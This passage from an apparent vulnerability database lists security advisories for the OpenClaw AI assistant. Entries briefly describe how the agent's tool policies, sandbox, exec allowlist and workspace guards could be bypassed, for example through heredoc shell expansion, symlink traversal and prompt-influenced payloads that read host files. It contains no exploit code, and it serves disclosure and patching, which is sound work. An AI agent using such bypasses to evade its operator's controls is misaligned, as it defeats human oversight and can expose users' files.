Workarounds Upgrade to `openclaw@2026.4.15` or later. The latest public release, `2026.4.21`, is fixed. Before upgrading, avoid exposing webchat sessions to untrusted prompt/tool content that can influence reply media URLs. ## Credits OpenClaw thanks @zsxsoft for reporting. |
Affected by 24 other vulnerabilities. |
|
VCID-gkyv-ahk7-1ud3
Aliases: GHSA-qrp5-gfw2-gxv4 |
OpenClaw: Bundled MCP/LSP tools could bypass configured tool policy ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Bundled MCP and LSP tools could be appended to the agent's effective tool set after the normal tool-policy pipeline had already filtered core tools. If an operator configured a restrictive policy, such as a tool profile, explicit allow/deny list, owner-only tool restriction, sandbox tool policy, or subagent tool policy, a bundled MCP/LSP tool could remain available even though the same policy would have denied it. The issue required a configured bundled MCP or LSP tool source and an operator policy that should have restricted that tool. This was a local agent policy-enforcement bypass, not an unauthenticated remote gateway compromise. Severity is medium. ## Fix OpenClaw now applies a final effective tool policy pass to bundled MCP/LSP tools before merging them into the tool set used by normal runs and compaction. The pass covers profile policy, provider profile policy, global/agent/group policies, owner-only filtering, sandbox tool policy, and subagent tool policy. Fix commit: - `0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-gvam-2net-8kc5
Aliases: CVE-2026-34503 GHSA-2pr2-hcv6-7gwv |
OpenClaw's device removal and token revocation do not terminate active WebSocket sessions ## Summary Removing a device or revoking its token updated stored credentials but did not disconnect already-authenticated WebSocket sessions. ## Impact A revoked device could continue using its existing live session until reconnect, extending access beyond credential removal. ## Affected Component `src/gateway/server-methods/devices.ts, src/gateway/server.impl.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `7a801cc451` (`Gateway: disconnect revoked device sessions`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-haxd-ps1x-h3ch
Aliases: CVE-2026-42430 GHSA-w8g9-x8gx-crmm |
OpenClaw: Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable ## Impact Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable. Strict browser SSRF checks could miss Playwright request-time navigation to private targets. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `2026.3.8` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @smaeljaish771 for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-hd4w-s3dp-nubj
Aliases: CVE-2026-41397 GHSA-cwf8-44x6-32c2 |
OpenClaw: OpenShell Mirror Sync — Sandbox Escape via Unrestricted File Sync + Symlink Traversal ## Summary OpenShell Mirror Sync: Sandbox Escape via Unrestricted File Sync + Symlink Traversal ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still has the mirror-boundary bug because shipped c02ee8 only excluded hooks while unreleased 3b9dab is the first full symlink-free upload and download hardening. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z - `3b9dab0ece4643a9643e6a45459f5c709d3ce320` — 2026-03-30T14:51:44+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-hkqd-6khg-m3hj
Aliases: GHSA-fqw4-mph7-2vr8 |
OpenClaw: Silent privilege escalation via gateway shared-auth reconnect ## Summary Gateway local shared-auth reconnect silently widens paired device scope from `operator.read` to `operator.admin` and reaches node RCE ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Silent local shared-auth reconnects could previously auto-approve `scope-upgrade` requests and widen a paired device from `operator.read` to `operator.admin`. Commit `81ebc7e0344fd19c85778e883bad45e2da972229` blocks silent reconnect scope upgrades so widened scopes require an explicit pairing approval instead of an implicit local reconnect path. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81ebc7e0344fd19c85778e883bad45e2da972229`. ## Fix Commit(s) - `81ebc7e0344fd19c85778e883bad45e2da972229` | There are no reported fixed by versions. |
|
VCID-hz33-9efv-c7ef
Aliases: GHSA-72q8-jcmc-97wx |
OpenClaw: Feishu card actions could misclassify DMs and skip dmPolicy ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Feishu card-action callbacks could synthesize a message event with DM conversations classified as group conversations. That skipped `dmPolicy` enforcement for card actions, so a sender in a Feishu DM could trigger card-action flows that should have been blocked by a restrictive DM policy. The issue is limited to Feishu card-action handling. Severity is medium. ## Fix OpenClaw now resolves Feishu card-action chat type before dispatch, including API lookup when stored context is unavailable, and avoids falling through to group handling for DMs. Fix commit: - `90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-j8fb-fhyc-33fu
Aliases: CVE-2026-41365 GHSA-chfm-xgc4-47rj |
OpenClaw: MSTeams thread history bypasses sender allowlist via Graph API ## Summary MSTeams thread history bypasses sender allowlist via Graph API ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Real in shipped v2026.3.28 MS Teams because Graph-fetched thread history bypasses sender allowlists, with unreleased mainline filtering fix. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `5cca38084074fb5095aa11b6a59820d63e4937c9` — 2026-03-30T15:38:26+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-j92n-5217-9bhj
Aliases: CVE-2026-35669 GHSA-qm2m-28pf-hgjw |
OpenClaw: Gateway Plugin HTTP Auth Grants Unrestricted operator.admin Runtime Scope to All Callers ## Summary Gateway Plugin HTTP auth: "gateway" Mints operator.admin Runtime Scope ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Gateway-authenticated plugin HTTP routes previously created a runtime scope set that included `operator.admin` regardless of caller-granted scopes. Commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe` keeps plugin HTTP runtime scopes least-privileged and preserves caller scope boundaries. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`. ## Fix Commit(s) - `ec2dbcff9afd8a52e00de054b506c91726d9fbbe` | There are no reported fixed by versions. |
|
VCID-jbwa-scg3-efeq
Aliases: CVE-2026-41380 GHSA-p4x4-2r7f-wjxg |
OpenClaw gateway exec allow-always over-trusts positional carrier executables ## Summary Allow-always persistence could trust wrapper carrier executables instead of the actual invoked target when commands were routed through dispatch wrappers. ## Impact A one-time approval could persist a broader future allowlist entry than the operator intended, weakening execution approval boundaries. ## Affected Component `src/infra/exec-approvals-allowlist.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `9ec44fad39` (`Exec approvals: reject wrapper carrier allow-always targets`). |
Affected by 150 other vulnerabilities. |
|
VCID-jdqk-kv8u-xqa9
Aliases: CVE-2026-41351 GHSA-37v6-fxx8-xjmx |
OpenClaw: Telnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding ## Summary Telnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Shipped v2026.3.28 replay hashing treated equivalent Telnyx Base64/Base64URL signatures as distinct requests, but signature verification still held, so lower to low. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `ad77666054651c1fd77b1dc60fd6a8db6600a29a` — 2026-03-30T20:01:43+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-jshg-1pb2-wbak
Aliases: CVE-2026-44116 GHSA-2hh7-c75g-qj2r |
OpenClaw validates Zalo outbound photo URLs through the SSRF guard ## Summary Zalo outbound photo URLs are validated through the SSRF guard. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact The Zalo plugin could forward an attacker-controlled outbound photo URL to the Zalo Bot API without first applying OpenClaw's SSRF validation policy. ## Fix Zalo sendPhoto now parses and validates outbound photo URLs with the shared SSRF hostname policy before posting to Zalo, and media-reply paths route through the guarded outbound media helpers. ## Fix Commit(s) - a65eb1b864b7630c1242a82de9e5799b80583c3f ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @foodlook for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-k3up-1vdf-2uh9
Aliases: GHSA-f275-5h5c-5wg5 |
Duplicate Advisory: OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-hc5h-pmr3-3497. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in the /pair approve command path that fails to forward caller scopes into the core approval check. A caller with pairing privileges but without admin privileges can approve pending device requests asking for broader scopes including admin access by exploiting the missing scope validation in extensions/device-pair/index.ts and src/infra/device-pairing.ts. |
Affected by 150 other vulnerabilities. |
|
VCID-k52b-966p-ybbk
Aliases: CVE-2026-33579 GHSA-hc5h-pmr3-3497 |
OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation ## Summary The `/pair approve` command path called device approval without forwarding caller scopes into the core approval check. ## Impact A caller that held pairing privileges but not admin privileges could approve a pending device request asking for broader scopes, including admin access. ## Affected Component `extensions/device-pair/index.ts, src/infra/device-pairing.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `4ee4960de2` (`Pairing: forward caller scopes during approval`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-k5da-7tht-w3bs
Aliases: GHSA-5r8f-96gm-5j6g |
OpenClaw Gateway `operator.write` can reach admin-only session reset via `chat.send` `/reset` ## Summary The `chat.send` path reused command authorization to trigger `/reset` session rotation even though direct session reset is an admin-only control-plane operation. ## Impact A write-scoped gateway caller could rotate a target session, archive the prior transcript state, and force a new session id without admin scope. ## Affected Component `src/gateway/server-methods/chat.ts, src/auto-reply/reply/session.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `be00fcfccb` (`Gateway: align chat.send reset scope checks`). |
Affected by 150 other vulnerabilities. |
|
VCID-k8s8-zjv4-gqdb
Aliases: GHSA-xrq9-jm7v-g9h7 |
OpenClaw: Paired-device pairing actions were not limited to the caller device ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact A paired device session with limited pairing scope could enumerate global pairing state and act on pairing requests that belonged to another device within the same gateway scope ceiling. This is a same-gateway paired-device authorization bug, not a remote unauthenticated issue. Severity is low. ## Fix Pairing management actions are now limited to the caller device, so non-admin paired-device sessions cannot approve or operate on unrelated pending device requests. Fix commit: - `5a12f30441d5b0b151f550daa2c5c9e8db61e2e6` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-kcy2-a98b-uyg7
Aliases: GHSA-x3h8-jrgh-p8jx |
OpenClaw's exec allowlist analysis rejects shell expansion in unquoted heredocs ## Summary Exec allowlist analysis rejects shell expansion in unquoted heredocs ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact An allowlisted command containing an unquoted heredoc could hide shell expansion in the heredoc body. That could make the approved command text look safer than what the shell would evaluate at runtime. ## Fix The exec command analyzer now tracks heredoc bodies, rejects unquoted heredoc expansion tokens and continuation-splice bypasses, and preserves quoted heredocs and literal safe text. ## Fix Commit(s) - b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. Thanks @VladimirEliTokarev for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-kzgh-7f6h-kfd1
Aliases: CVE-2026-41377 GHSA-cwq8-6f96-g3q4 |
OpenClaw: Security Scan Failure Does Not Block Plugin Installation (Fail-Open) ## Summary Security Scan Failure Does Not Block Plugin Installation (Fail-Open) ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: Real in shipped v2026.3.28 plugin install flow, but low severity fits because it still requires an operator to choose installation of an untrusted package and the scan failure was visible rather than silent. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `7a953a52271b9188a5fa830739a4366614ff9916` — 2026-03-30T15:36:08+01:00 - `44b993613601280d46a5b88190e46669fc13d669` — 2026-03-31T23:16:11+09:00 - `0d7f1e2c84eca65df7dee890d9c30e2a841c030a` — 2026-03-31T23:27:20+09:00 - `bf96c67fd1954740aeabfadc7cfe3098bcfc6b68` — 2026-03-31T15:53:29+01:00 OpenClaw thanks @davidluzsilva for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-ma62-gtan-97au
Aliases: CVE-2026-42431 GHSA-cmfr-9m2r-xwhq |
## Impact OpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` persistent profile-mutation guard. `node.invoke(browser.proxy)` could mutate persistent browser profiles through a path that bypassed the `browser.request` guard. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= v2026.04.01` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-mcz5-wgu1-z7g7
Aliases: CVE-2026-41343 GHSA-qcc3-jqwp-5vh2 |
OpenClaw: LINE webhook handler lacks shared pre-auth concurrency budget before signature verification ## Summary LINE webhook handler lacks shared pre-auth concurrency budget before signature verification ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: Shipped v2026.3.28 lacks a shared pre-auth concurrency budget on the public LINE webhook path, but the effect is bounded transient availability loss only, so low fits. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `57c47d8c7fbf5a2e70cc4dec2380977968903cad` — 2026-03-31T19:34:25+09:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-mggy-bv5s-5uax
Aliases: GHSA-8j7f-g9gv-7jhc |
Duplicate Advisory: OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476) ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-rhfg-j8jq-7v2h. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to blocked internal destinations and access restricted resources. |
Affected by 150 other vulnerabilities. |
|
VCID-mszk-dr24-xugw
Aliases: CVE-2026-43567 GHSA-jf25-7968-h2h5 |
OpenClaw: screen_record outPath bypassed workspace-only filesystem guard ## Summary screen_record outPath bypassed workspace-only filesystem guard. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The node-host screen recording tool could honor an `outPath` outside the workspace guard, allowing an authorized tool call to write outside the intended workspace boundary. ## Technical Details The fix applies the workspace-root guard to node tool `outPath` handling, including screen recording paths. ## Fix The issue was fixed in #63551. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `635bb35b68d8faa5bfa2fda35feadd315122748a` - PR: #63551 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @anshumanbh for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-mv8b-cryt-u3g8
Aliases: CVE-2026-41911 GHSA-5fc7-f62m-8983 |
OpenClaw: Feishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix) ## Impact Feishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix). Feishu document uploads could read local files outside the workspace-only file policy when processing docx upload blocks. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.4.3` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @Rosayxy for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-mxu5-yjqs-nuap
Aliases: CVE-2026-43573 GHSA-527m-976r-jf79 |
OpenClaw: Existing-session browser interaction routes bypassed SSRF policy enforcement ## Summary Existing-session browser interaction routes bypassed SSRF policy enforcement. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Existing-session browser interaction routes could continue interacting with or navigating targets without applying the same SSRF navigation guard used by guarded browser routes. ## Technical Details The fix guards existing-session navigation and interaction routes with browser navigation policy checks. ## Fix The issue was fixed in #64370. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `daeb74920d5ad986cb600625180037e23221e93a` - PR: #64370 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-nkh4-j2pe-1qhr
Aliases: CVE-2026-44117 GHSA-c4qg-j8jg-42q5 |
OpenClaw: QQBot direct media upload skipped URL SSRF validation ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact The QQBot direct-upload media path could forward attacker-controlled image URLs without applying the SSRF validation used by the local download path. This could make configured QQBot media delivery request or relay URLs the operator did not intend to allow. The affected path is limited to QQBot outbound media handling and does not expose arbitrary local files. Severity is low. ## Fix OpenClaw now validates QQBot direct-upload media URLs before `uploadC2CMedia` and `uploadGroupMedia` direct-upload calls. Fix commit: - `49db424c8001f2f419aad85f434894d8d85c1a09` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-ns77-4wfj-9ka6
Aliases: CVE-2026-43571 GHSA-82qx-6vj7-p8m2 |
OpenClaw: Channel setup catalog lookups could include untrusted workspace plugin shadows ## Summary Channel setup catalog lookups could include untrusted workspace plugin shadows. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Channel setup could resolve a workspace plugin shadow before a bundled channel plugin, causing setup-time plugin loading without the intended trust gate. ## Technical Details The fix routes setup catalog lookups through trusted catalog paths and uses `excludeWorkspace: true` where setup should not include workspace shadows. ## Fix The issue was fixed in the advisory fix branch. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `1fede43b948df40ca8674511d4bd08d39f6c5837` - PR: private advisory fork ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-ntwt-jkgr-sffu
Aliases: CVE-2026-42421 GHSA-5h3f-885m-v22w |
OpenClaw: Existing WS sessions survive shared gateway token rotation ## Impact Existing WS sessions survive shared gateway token rotation. Rotating the shared gateway token did not disconnect existing shared-token WebSocket sessions. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-nv6g-7gs9-pfan
Aliases: GHSA-92jp-89mq-4374 |
OpenClaw: Sandbox noVNC helper route exposed interactive browser session credentials ## Summary Sandbox noVNC helper route exposed interactive browser session credentials. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.2.21 < 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The sandbox noVNC helper route could be reached without the intended bridge authentication, exposing an interactive browser session surface. ## Technical Details The fix gates the sandbox noVNC helper route behind bridge authentication. ## Fix The issue was fixed in #63882. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `8dfbf3268bd224b7377d1ecca77a445100746085` - PR: #63882 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-nw4r-wjgs-8qc1
Aliases: CVE-2026-41910 GHSA-vc32-h5mq-453v |
OpenClaw: /allowlist omits owner-only enforcement for cross-channel allowlist writes ## Impact /allowlist omits owner-only enforcement for cross-channel allowlist writes. An authorized non-owner sender could attempt allowlist writes against a different channel. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=v2026.4.1` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @zsxsoft and @KeenSecurityLab for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-p7gx-9usz-yyew
Aliases: CVE-2026-42429 GHSA-4f8g-77mw-3rxc |
OpenClaw: Gateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write` ## Impact Gateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write`. Plugin HTTP routes using gateway auth could receive runtime write scopes even when the upstream trusted-proxy request only declared read. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `2026.1.29` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @smaeljaish771 for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-p7me-4bzz-83cm
Aliases: CVE-2026-41297 GHSA-vjx8-8p7h-82gr |
OpenClaw: Marketplace Plugin Download Follows Redirects Without SSRF Protection ## Summary Marketplace Plugin Download Follows Redirects Without SSRF Protection ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still uses bare redirect-following fetch in src/plugins/marketplace.ts for marketplace archives, and fixed-on-main only does not change that shipped SSRF exposure. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `2ce44ca6a1302b166a128abbd78f72114f2f4f52` — 2026-03-31T12:59:42+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-p7v5-jqhq-nbhz
Aliases: GHSA-846p-hgpv-vphc |
OpenClaw: QQ Bot structured payloads could read arbitrary local files ## Summary Before OpenClaw 2026.4.2, QQ Bot structured media payloads could read local files from attacker-chosen paths. A crafted structured payload could escape QQ Bot-owned media roots and cause arbitrary file reads on the host. ## Impact Prompt-influenced structured payload output could exfiltrate any host file readable by the OpenClaw process through the QQ Bot media-send path. This was a real confidentiality bug on the host filesystem boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `2c45b06afdd6f7c621038b5419d8e661cff34a7f` — restrict QQ Bot structured payload local paths ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-p8xd-2um4-9ufr
Aliases: CVE-2026-41908 GHSA-v8qf-fr4g-28p2 |
OpenClaw: Assistant media route missed scope enforcement for trusted-proxy authorization ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact The Control UI assistant-media route authenticated trusted-proxy callers but did not enforce the declared operator scopes for identity-bearing HTTP auth paths. A trusted-proxy caller without `operator.read` could access assistant-media files and metadata that were otherwise inside allowed media roots. The route still required successful gateway authentication and media-root checks. Severity is low. ## Fix Assistant-media file and metadata requests now require `operator.read` on identity-bearing HTTP auth paths. Fix commit: - `99ef3a63c58440d53f8e45ad861b846032fcb036` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-pae5-uyu7-k3c1
Aliases: CVE-2026-43580 GHSA-536q-mj95-h29h |
OpenClaw: Browser press/type interaction routes missed complete navigation guard coverage ## Summary Browser press/type interaction routes missed complete navigation guard coverage. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Some browser press/type style interactions could trigger navigation without complete post-action SSRF policy enforcement. ## Technical Details The fix applies a three-phase interaction navigation guard to navigation-capable interactions, including pressKey and type submit flows. ## Fix The issue was fixed in #62023, #63226, and #63889. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe` - `5f5b3d733bdd791cb457f838514179e1288b10b3` - `e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894` - PR: #62023, #63226, #63889 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-pc9z-x5wk-8ue7
Aliases: CVE-2026-33580 GHSA-9528-x887-j2fp |
